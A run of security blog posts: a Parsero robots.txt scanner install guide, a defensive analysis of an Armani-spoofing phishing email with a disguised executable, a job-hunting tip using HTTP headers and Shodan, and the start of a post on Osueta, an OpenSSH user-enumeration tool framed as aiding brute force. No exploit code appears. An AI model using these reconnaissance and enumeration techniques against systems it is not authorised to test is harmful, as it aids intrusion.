<br />
Parsero is a free script written in Python which reads the Robots.txt
file of a web server and looks at the Disallow entries. The Disallow
entries are the URL path of directories or files hosted on a web server
which the administrators don't want to be indexed by crawlers. For
example, "Disallow: /portal/login" don't allow to search engines like Google, Bing, Yahoo to index <a href="http://www.example.com/portal/login">www.example.com/portal/login</a> so nobody can locate it by searching on them.<br />
<br />
<div style="text-align: justify;">
Sometimes these paths typed in the Disallows entries are directly
accessible by the users (without using a search engine) just visiting
the URL and the Path. Sometimes they are not available to be visited
by anybody... Because it is really common that the administrators write a
lot of Disallows and some of them are available and some of them are
not, you can use Parsero in order to check the HTTP status code of each
Disallow entry in order to check automatically if these directories are
available or not.</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br />
Also, the fact that the administrator write a Robots.txt doesn't mean that
the files or directories typed in this file will not be indexed by
Bing, Google, Yahoo... For this reason, Parsero is capable of performing
searches in Bing to locate content indexed without the web administrator
authorization.</div>
<div style="text-align: justify;">
</div>
</div>
<div style="text-align: justify;">
<br />
Now, you can run Parsero v0.75 directly from this awesome distribution. So, what do you need to use Parsero in Kali Linux?<br />
<h2>
Installing Parsero in Kali Linux </h2>
</div>
<div style="text-align: justify;">
First of all, you need to execute:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: center;">
<span style="font-family: inherit;">root@kali:~# apt-get update</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguUXeRtBNnrkS8l1NayMQJc6LEutCYx-i-kpmjnTNc5skwkBrXjjkGNtWnE7KuuSPwx2razvIiM8UDW2MYN8kCsxlmd5PjWjJvmAL_wzUIQxTzO-Cmcia8oEv9oguvipxCxHNt1AYi6Ds/s1600/Kali_Linux2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguUXeRtBNnrkS8l1NayMQJc6LEutCYx-i-kpmjnTNc5skwkBrXjjkGNtWnE7KuuSPwx2razvIiM8UDW2MYN8kCsxlmd5PjWjJvmAL_wzUIQxTzO-Cmcia8oEv9oguvipxCxHNt1AYi6Ds/s1600/Kali_Linux2.png" height="403" width="640" /></a></div>
<br />
Then, you can search directly Parsero in the Kali Linux repositories by using the command bellow:<br />
<div style="text-align: center;">
<br />
root@kali:~# apt-cache search parsero </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhLBTBbZ2SZTNIlYv_odSkg8PhrRHxdWiTNl-reIE2OK1mgsusCngwg5TJn9ASL5-33lakYAlv2pZv5QKKjA9BdheJurVGBWW33KG8__hhZm6_mNqYeLce7x0e9ffLaQbMGKfaNmf3Y58/s1600/Kali_Linux3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhLBTBbZ2SZTNIlYv_odSkg8PhrRHxdWiTNl-reIE2OK1mgsusCngwg5TJn9ASL5-33lakYAlv2pZv5QKKjA9BdheJurVGBWW33KG8__hhZm6_mNqYeLce7x0e9ffLaQbMGKfaNmf3Y58/s1600/Kali_Linux3.png" height="35" width="320" /></a></div>
<br />
<br />
Finally run the following command to install it.<br />
<br />
<div style="text-align: center;">
root@kali:~# apt-get install parsero</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6YKf74o8n6yTrxTnri5gq8Z7EMZh_IYJqYiBMTTS0rJpQ7TDONLfbG6FelBdixrjB-yGWer3YOAnh-dfa8NuIlAI70eZbYnwbfeiN3bys4iYgteswhNHP-cBulZRRfKiM_yxSHnzM3Zg/s1600/Kali_Linux4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6YKf74o8n6yTrxTnri5gq8Z7EMZh_IYJqYiBMTTS0rJpQ7TDONLfbG6FelBdixrjB-yGWer3YOAnh-dfa8NuIlAI70eZbYnwbfeiN3bys4iYgteswhNHP-cBulZRRfKiM_yxSHnzM3Zg/s1600/Kali_Linux4.png" height="401" width="640" /></a></div>
<br />
<div style="text-align: justify;">
Now you can have fun by checking the directories or files which could have sensitive information and should be "anonymous" to the search engines...</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEildmFQL5Wq8Abm-EIPuJe_rbsM5sEWBxKLR3CYEsB1RAvpAZTfKbK9t6w-IX-nrHTWEJKi57P6Y7ycM9KPvdlkJA8txT9muI-6pblDRLDHuKXnUFW4eHZ-NWMbeLGpg4VyG1JMbKZyBPs/s1600/Kali_Linux6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEildmFQL5Wq8Abm-EIPuJe_rbsM5sEWBxKLR3CYEsB1RAvpAZTfKbK9t6w-IX-nrHTWEJKi57P6Y7ycM9KPvdlkJA8txT9muI-6pblDRLDHuKXnUFW4eHZ-NWMbeLGpg4VyG1JMbKZyBPs/s1600/Kali_Linux6.png" height="432" width="640" /></a></div>
<br />
Currently, I'm working on developing the new release which will have another feature. It will be available here: <a href="https://github.com/behindthefirewalls/Parsero" target="_blank">https://github.com/behindthefirewalls/Parsero</a><br />
<br />
<br />
<br />Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com0tag:blogger.com,1999:blog-3160485247929481680.post-8066850089112244012014-08-26T05:34:00.000-07:002014-08-27T02:39:10.581-07:00Have I bought these clothes? Another spread malware campaign.<div style="text-align: justify;">
When I was reading one of the <a href="http://www.fireeye.com/blog/technical/2014/07/the-little-signature-that-could-the-curious-case-of-cz-solution.html" target="_blank">last FireEye's post</a>, I was struck by the binary they said it came in the form of phished email (MD5:7c00ba0fcbfee6186994a8988a864385) purportedly from Armani regarding an order. I believe it is interesting to analyze because it could be a real example of an APT or maybe just another spread malware campaign. The techniques used in this real case, could be used in both scenarios...</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
But FireEye shared the mail's MD5 checksum and they didn't provide us with a copy of the message. Thanks to the <a href="http://contagiodump.blogspot.com.es/2014/07/cz-solution-ltd-signed-samples-of.html" target="_blank">last ContagioDump post</a>, we are able to download all samples and a little more FireEye previously mentioned.</div>
<div style="text-align: justify;">
<br />
After downloading and opening the message, we can see the details of this mail in the picture bellow. It appears to have been sent by confirmation(at)armani[.]com and contains what appears to be an order with a file attached.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqaW7JDncZ5jOFO1fe3GIe7ljxODAiXBA2wBMkedoHxxlXkGeJVF1-FvLHzChhm2lhGy13VOD1lqrUiC-bhKF3eF1Ued3wVl75kDUnm9SSMsgx5wRg8d43ZoYh41V2pDi4FFeR8qQEAe4/s1600/AC-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqaW7JDncZ5jOFO1fe3GIe7ljxODAiXBA2wBMkedoHxxlXkGeJVF1-FvLHzChhm2lhGy13VOD1lqrUiC-bhKF3eF1Ued3wVl75kDUnm9SSMsgx5wRg8d43ZoYh41V2pDi4FFeR8qQEAe4/s1600/AC-1.png" height="338" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<h2>
Analysing the SMTP headers</h2>
Before opening the file attached, let's see the mail headers to get deep into who really sent the message. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9NQL4RC74UK2JhwPEK0Epk_xIVtMWyb4buN8bBF4hRlyf53DN_0H6AwW-c4KbHEgVYRB28lOEofSsfbottwndVJJC2jWxxDgnTIyJagh3mskqxon_Qu9jjr91-mXSa4e9lTqAm5Rqwe8/s1600/AC-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9NQL4RC74UK2JhwPEK0Epk_xIVtMWyb4buN8bBF4hRlyf53DN_0H6AwW-c4KbHEgVYRB28lOEofSsfbottwndVJJC2jWxxDgnTIyJagh3mskqxon_Qu9jjr91-mXSa4e9lTqAm5Rqwe8/s1600/AC-2.png" height="112" width="400" /></a></div>
<br />
We can see the <a href="http://db-ip.com/78.250.54.171" target="_blank">IP</a><a href="http://db-ip.com/78.250.54.171" target="_blank"></a>
(which sent the mail) comes from Paris and the <a href="https://who.is/whois-ip/ip-address/78.250.54.171" target="_blank">WHOIS</a> description tells us that this IP belongs to a "Wifi Address Pool". Maybe it is a free Wifi or a hacked Wifi where the hackers were connected to send the email, or maybe the host which delivered the mail was infected and was connected to this Wifi when the mail was sent...<br />
<br />
By reading the mail headers, we can get more information like the mail's hops. Notice the second one has been <a href="http://mxtoolbox.com/SuperTool.aspx?action=blacklist%3a212.227.126.130&run=toolpage" target="_blank">blacklisted</a>. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih5D3rEPj6Nhe1WdmM-Y5VttaZh-eul6_UGRDg_FN3szwXo4-3u8zlqI5SZ3Ds6xmPbXYHClmFvV7DrcGtbwJbaKJwff5aVyg2ct18ExHCJHoBkKY7XJDeTTGX85VuhB7V-P9t9ItMsx8/s1600/AC-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih5D3rEPj6Nhe1WdmM-Y5VttaZh-eul6_UGRDg_FN3szwXo4-3u8zlqI5SZ3Ds6xmPbXYHClmFvV7DrcGtbwJbaKJwff5aVyg2ct18ExHCJHoBkKY7XJDeTTGX85VuhB7V-P9t9ItMsx8/s1600/AC-3.png" height="124" width="640" /></a></div>
<br />
If we continue analyzing the headers we can see something weird...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg1fbE02322qyxrmNBn3dHKcozYaM1THJo94fyMZj_GtIUpR8W0SjIjLAVwuFXK-AxvPIiyQrFGZznhHy0SmT72FQITp8IWsiyyhOuRmlx83Zmk_Og6IGKwequTGfgpq9KttCW_RpKc-U/s1600/AC-4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg1fbE02322qyxrmNBn3dHKcozYaM1THJo94fyMZj_GtIUpR8W0SjIjLAVwuFXK-AxvPIiyQrFGZznhHy0SmT72FQITp8IWsiyyhOuRmlx83Zmk_Og6IGKwequTGfgpq9KttCW_RpKc-U/s1600/AC-4.png" height="263" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqXM97UG2X5MfSmPRE_EaStLTLH1Uuvn9SYaBGkAUcrJnybmWgFlvkUQ9NzHjHaSxsT6wjlvn6xLrP-P2cHeo0ITM-k3GU8QtpuMrJzFRQTtTrGW8tyhFYn8SAJ9nRRxAfcK35Ap0rAL4/s1600/AC-4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYindaO0nFQwMYAY6VpdB4XyCtEvFH3EHBnHkRLOl7b17Efq5J8q0cJmUS1y50mkbw_1m-4YQL_gD5mdltOPEXkbHaBKUgWOTBgD8x9OSSnc8iJSVA8gsrsCZRsfIwaBvxBe5lku9LQwM/s1600/AC-5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYindaO0nFQwMYAY6VpdB4XyCtEvFH3EHBnHkRLOl7b17Efq5J8q0cJmUS1y50mkbw_1m-4YQL_gD5mdltOPEXkbHaBKUgWOTBgD8x9OSSnc8iJSVA8gsrsCZRsfIwaBvxBe5lku9LQwM/s1600/AC-5.png" /></a></div>
<br />
In the pictures above we can see that the X-sender and the Return-Path belong to a hotel mail account. These fields mean:<br />
<br />
<ul>
<li>X-Sender: Tell us the real sender directly in the message headers. </li>
<li><span class="c1">Return-Path: Denotes the real sender but only "post factum"</span>. </li>
</ul>
<br />
I've checked that the SMTP servers from which the mail was sent need authorization to send e-mails. Also, the hotel mail account which delivered the mails used the <a href="http://postmaster.1and1.com/en/email-server/" target="_blank">SMTP servers</a> which are hosted in the same hosting provider that the hotel web site is hosted on. So we could assume that this hotel is using these servers to send mail and the mail account could have been stolen. The hackers sent the phished mail from the hotel account but changing the "from" to confirmation(at)armani[.]com<br />
<br /></div>
<div style="text-align: justify;">
Also we can see that the domain name of the company spoofed doesn't have a <a href="http://mxtoolbox.com/SuperTool.aspx?action=spf%3aarmani.com&run=toolpage" target="_blank">SPF record</a>. That means that it is easier to send an email with the "from" faked. A SPF record prevent spammers from sending messages with forged From addresses. Here you can get more valuable<a href="https://support.google.com/a/answer/33786?hl=en" target="_blank"> info about SPF</a>.<br />
<h2>
Tricking the end user</h2>
After spending some time digging into the SMTP headers to have further information about the sender, is time to focus on the attachment.</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHvzWG8AmYIGlX2pR6aCgJ5Y2ioHFOpyKDRYJMTuo3AEAhugr9nb63kDdvrxNfMOqU8lfwUB9T8ee5J75Bn57wbQd1jJXNdxv4age3v0MCfD8jK_S9wGHJ8am6-RwlH3AWLm6qOab8xzg/s1600/AC-6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHvzWG8AmYIGlX2pR6aCgJ5Y2ioHFOpyKDRYJMTuo3AEAhugr9nb63kDdvrxNfMOqU8lfwUB9T8ee5J75Bn57wbQd1jJXNdxv4age3v0MCfD8jK_S9wGHJ8am6-RwlH3AWLm6qOab8xzg/s1600/AC-6.png" /></a></div>
</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br />
It seems an attempt has been made to disguise this file as a PDF file but we noticed that the extension is actually ".7z". If we unzip the file inside the ".7z" file to our Desktop...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMGcvAf_K4k6vndR9siCpync5qoLvbGZRp8o4_lip13tL7Ngg4sS-TDzNT5bhKMbx5IF5r719Us-HU6BhcuZmocCV-5PmI-fgHpUpnKUvCihdlTByTmvcyjuAxEPEVG5-lRyxv4M18Phk/s1600/AC-7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMGcvAf_K4k6vndR9siCpync5qoLvbGZRp8o4_lip13tL7Ngg4sS-TDzNT5bhKMbx5IF5r719Us-HU6BhcuZmocCV-5PmI-fgHpUpnKUvCihdlTByTmvcyjuAxEPEVG5-lRyxv4M18Phk/s1600/AC-7.png" /></a></div>
<br />
...we see that the icon appears to be a PDF file with a weird extension: "pdf%%". We can't see the .exe extension because the "hide extensions for known file types" option is enabled in our Windows. FireEye said that this this file is using <a href="https://blog.malwarebytes.org/online-security/2014/01/the-rtlo-method/" target="_blank">RTLO</a> to trick the user but we can't see this technique in the attachment, at least the extension doesn't change... By using RTLO it would be expected to have an extension "exe.pdf" instead of "pdf.exe" which runs as an application, but the attachment doesn't work in this way in our Windows 7. But it doesn't matter, maybe in my next post I will talk about how easy is using RTLO and icon changing to trick a user into opening a file which appears to be a valid document but it is actually malware. That kind of techniques are really used in really attacks like in <a href="http://www.behindthefirewalls.com/2014/03/siesta-campaign-nothing-is-what-it-seems.html" target="_blank">Siesta Campaign</a> or others ones used like <a href="http://www.behindthefirewalls.com/2014/04/why-you-shouldnt-open-files-directly-from-winrar.html" target="_blank">WinRar File extension spoofing</a>.<br />
<br />
I would like to look at the executable before continuing about how the hackers are trying to trick the user. We notice that this executable is signed with a certificate which has been revoked.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEAUrxNaWkV7tBe6AUo-x-Gvwff1tTJrNMQvSlF4Gprj9gC0HhcO_y2tgzthkz7W2uoVE9ZAmJKZdynFR3CoC932G_EAafjyIALNA1rF_qRySkI3seV-J31D5dKDafkVSNCBxcHvi79yA/s1600/AC-8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEAUrxNaWkV7tBe6AUo-x-Gvwff1tTJrNMQvSlF4Gprj9gC0HhcO_y2tgzthkz7W2uoVE9ZAmJKZdynFR3CoC932G_EAafjyIALNA1rF_qRySkI3seV-J31D5dKDafkVSNCBxcHvi79yA/s1600/AC-8.png" height="201" width="400" /></a></div>
</div>
<div style="text-align: justify;">
This stolen certificate has been used to bypass the security system of so many security software and devices. Some of them, the first check they do is to discover if the executable is signed, and if it is with a valid certificate, no more security actions are made and the executable is allowed to get into the network. Of course, after the company realized this problem, they revoked the certificate...<br />
<br />
So, what happens if we execute the file which looks like a PDF file?<br />
<br />
While the <a href="https://www.virustotal.com/en/file/dbf409fee8158583f231c2318bc6a1c89fd943fcc30c8909f50af8c66b510941/analysis/" target="_blank">malware</a> is doing evil actions, a web browser is open with the supposed Armani order.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgB1m_Qc6Z6aH8GR55Z82pkBLJSSBZ3aBy6az16rHkoyBLF2wYLyiF4_eCemWIF9LJWISivwP6I0I8teE5zpVpX6iMNADrg8h37S8HJqoqHSoZQcxYcKVxLCDX9Fe11XemvgN4nyO1gS8/s1600/AC-9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgB1m_Qc6Z6aH8GR55Z82pkBLJSSBZ3aBy6az16rHkoyBLF2wYLyiF4_eCemWIF9LJWISivwP6I0I8teE5zpVpX6iMNADrg8h37S8HJqoqHSoZQcxYcKVxLCDX9Fe11XemvgN4nyO1gS8/s1600/AC-9.png" height="482" width="640" /></a></div>
<br />
For security guys, these techniques do not go unnoticed to a trained eye, but we can see how it happens every day to the layman.<br />
<h2>
Conclusion</h2>
Thanks to Fireye and Contagiodump who shared their analysis and samples, we have been able to see how the hacker probably got access to a hotel mail account to start a SPAM campaign and sent a spear phishing attack. They spoofed a mail account of a well know clothes brand. That company doesn't have a SPF record to prevent from being spoofed.<br />
<br />
Also, we have observed how the hacker has tried to disguised the malicious executable as PDF by changing the icon to a PDF picture and maybe using RTLO. Also, after opening the file, a web browser is opened with the apparent order while the <a href="https://www.virustotal.com/en/file/dbf409fee8158583f231c2318bc6a1c89fd943fcc30c8909f50af8c66b510941/analysis/" target="_blank">malware</a> is doing evil actions.<br />
<br />
Moreover, I've been researching a little more about that case and I've found an advertisement in Facebook <a href="https://www.facebook.com/Marnaque/posts/491122357681969" target="_blank">https://www.facebook.com/Marnaque/posts/491122357681969</a> which talks about a similar phished mail. Notice that now they are trying to spoof another clothes brand and they are using a similar body mail using the same order number: 0801E376E15829. We can suspect the same guys are behind that...<br />
<br />
<br /></div>
Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com0tag:blogger.com,1999:blog-3160485247929481680.post-15592072841466307852014-07-15T12:32:00.001-07:002014-07-15T12:39:03.526-07:00Looking for a job in the security field in a different way<div style="text-align: justify;">
You already know what the most common way of getting a job is. You usually look for <span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">vacancies</span></span> in a job web portal and when you think you could be selected, you apply for it... Then, most of the companies look at your resume and start reading about your previous experience and your studies... </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
But if you are looking at getting a new job in the security field, take a moment to look around before sending your resume... Maybe the company is giving you an advantage against the other candidates and you have no idea about it.</div>
<h2 style="text-align: justify;">
Have you looked at the web code source?</h2>
<div style="text-align: justify;">
Yes, you have read well. Maybe you are using a well known security scanner and maybe you would like to work for them. You should research the company a little bit more. For example, visit their website and look at their web code source... Sometimes you have some surprises as you can see in the picture bellow...</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidEm5CDXV7mthFrzXOe3NtwlTy4GorhyphenhyphenJKQJ825RmAFqmSYkmiklJV_M3-zpcOAG2O8PTT9SVyTpgWOyNtQC6GxuYVOKi3f_cJMGqqAN-GETs4sgMjILmcexnqEcrM7oz7ZDg-U5nrd6Y/s1600/Tenable_II.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidEm5CDXV7mthFrzXOe3NtwlTy4GorhyphenhyphenJKQJ825RmAFqmSYkmiklJV_M3-zpcOAG2O8PTT9SVyTpgWOyNtQC6GxuYVOKi3f_cJMGqqAN-GETs4sgMjILmcexnqEcrM7oz7ZDg-U5nrd6Y/s1600/Tenable_II.png" height="220" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<h2>
Looking at your network traffic</h2>
<div style="text-align: justify;">
Here, another real example... While I was studying in order to improve my technical skills, I found a hint in the PCAP network capture by using Wireshark... I never would have imagined that I could find a new job by reading a network traffic capture...</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnmnYE4vaFHuJSR6URkukLBWy5jgjjNV6aFPrVSZMTMKpHRbLJ5NOEBJxY90-kGI0rUFCSKft9aWC9yTPR_nRUWYWjfrXzbYTdhHF5lsnHxobxVQ9leYOiRrVigrRwNIvYRrdq1RhtIpg/s1600/Wireshark-II.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnmnYE4vaFHuJSR6URkukLBWy5jgjjNV6aFPrVSZMTMKpHRbLJ5NOEBJxY90-kGI0rUFCSKft9aWC9yTPR_nRUWYWjfrXzbYTdhHF5lsnHxobxVQ9leYOiRrVigrRwNIvYRrdq1RhtIpg/s1600/Wireshark-II.png" height="178" width="640" /></a></div>
<br />
<h2>
Looking into the HTTP headers</h2>
<div style="text-align: justify;">
What we really discovered before was that the company changed the HTTP header in order to show you a "secret" message. So, instead of getting a traffic capture to read the "secret" message, we could use wget to try to look for a new oportunity.<br />
<br />
wget -S example.com -O /dev/null</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDo51yrikp5n3CBDhP-mtQL1yZfYHWM8i_20J6jpOXzGkyhnY00DKx2MEZ0gN_BOrehS1LaLcwYDZpdCxrxxSaIAy9wl-_qEfglxL6IgmdlYAmlU4ijI3b-R3Gn_ufGIAGhJzqaKd7yic/s1600/Http_Header.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDo51yrikp5n3CBDhP-mtQL1yZfYHWM8i_20J6jpOXzGkyhnY00DKx2MEZ0gN_BOrehS1LaLcwYDZpdCxrxxSaIAy9wl-_qEfglxL6IgmdlYAmlU4ijI3b-R3Gn_ufGIAGhJzqaKd7yic/s1600/Http_Header.png" /></a></div>
<br />
<h2>
Looking for a job in Shodan</h2>
<div style="text-align: justify;">
<div style="text-align: justify;">
You already know that Shodan grab and index the HTTP headers they scan... So we can get a lot of results as the previous one by using Shodan.</div>
<br />
Here, more examples....</div>
<br />
<a href="http://www.shodanhq.com/search?q=x-hacker+work" target="_blank">http://www.shodanhq.com/search?q=x-hacker+work</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3oW-Htn2XVvVcT39XVnU9leq9zGCU_2FHFcEJGC5f8pAnBucZRbiiE6ggnUxWXpQJGFtoYyruze3cM4rfTWxflHx7UeXxm_RyV4csJcH3boBhPbSnGXZCx5bEht0eESBamWvsYWEYfew/s1600/Shodan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3oW-Htn2XVvVcT39XVnU9leq9zGCU_2FHFcEJGC5f8pAnBucZRbiiE6ggnUxWXpQJGFtoYyruze3cM4rfTWxflHx7UeXxm_RyV4csJcH3boBhPbSnGXZCx5bEht0eESBamWvsYWEYfew/s1600/Shodan.png" height="322" width="640" /></a></div>
<br />
<a href="http://www.shodanhq.com/search?q=x-hacker+job" target="_blank">http://www.shodanhq.com/search?q=x-hacker+job</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj95WUTigZFuWAmJzXujGf-wBxzzcKwzp10F35clwy7rMutj0gbixn1UwrzroNohouPKe_k4kbAUj6Ns7ZKb62IICTwLKQnQz5u6KHOLNAn8VDXklDsXRMwUQHvJ0amW6a3fb5nub89uSQ/s1600/Shodan-II.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj95WUTigZFuWAmJzXujGf-wBxzzcKwzp10F35clwy7rMutj0gbixn1UwrzroNohouPKe_k4kbAUj6Ns7ZKb62IICTwLKQnQz5u6KHOLNAn8VDXklDsXRMwUQHvJ0amW6a3fb5nub89uSQ/s1600/Shodan-II.png" height="370" width="640" /></a></div>
<br />
<a href="http://www.shodanhq.com/search?q=hiring" target="_blank">http://www.shodanhq.com/search?q=hiring</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqyK-x8qxxdWfxez7q_I5Kn7rGZF6VjK4Iz3VIcMpJS3pldsFLp8YrbS4I6SFvp1tDhAoF5aWX2pBmV-ltXOCpmvQXHOdlZC5trQJ7UzDN1TEmwfx2AKsu8Q25aLON5QunYRob4PkXxhc/s1600/Shodan-III.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqyK-x8qxxdWfxez7q_I5Kn7rGZF6VjK4Iz3VIcMpJS3pldsFLp8YrbS4I6SFvp1tDhAoF5aWX2pBmV-ltXOCpmvQXHOdlZC5trQJ7UzDN1TEmwfx2AKsu8Q25aLON5QunYRob4PkXxhc/s1600/Shodan-III.png" height="350" width="640" /></a></div>
<br />
<br />Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com0tag:blogger.com,1999:blog-3160485247929481680.post-69503331560131131942014-07-01T07:23:00.000-07:002014-07-01T07:24:07.655-07:00OpenSSH User Enumeration Time-Based Attack with Osueta<h2>
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">Introduction </span></span></h2>
<div style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">In this post I'd like to introduce you to an awesome tool focused on taking advantage of an OpenSSH vulnerability. I'd like to thank <a href="https://twitter.com/cor3dump3d" target="_blank">@cor3dump3d</a></span></span><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"> for letting me participate in his project. Before starting, just a brief introduction...</span></span><br />
<br />
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">OpenSSH is a well-known tool to remotely manage *nix systems. It has replaced to </span></span>telnet, rlogin, and ftp. Using these tools, the data (even passwords) is transmitted across the network unencrypted. OpenSSH encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other attacks... But will not eliminate all kinds of attacks, for example, the OpenSSH User Enumeration Time-Based Attack. Osueta<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"> has been developed to take advantage of that OpenSSH bug and offers us a way to improve our Brute Force attacks against an OpenSSH server.</span></span></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">In a Brute Force attack, we try different usernames and passwords in combination until the attack is successful. It is </span></span><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">successful</span></span> when we get access to the system by using the credentials guessed. So, we need to know two fields to be authenticated on a OpenSSH server: Username and Password.</span></span></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
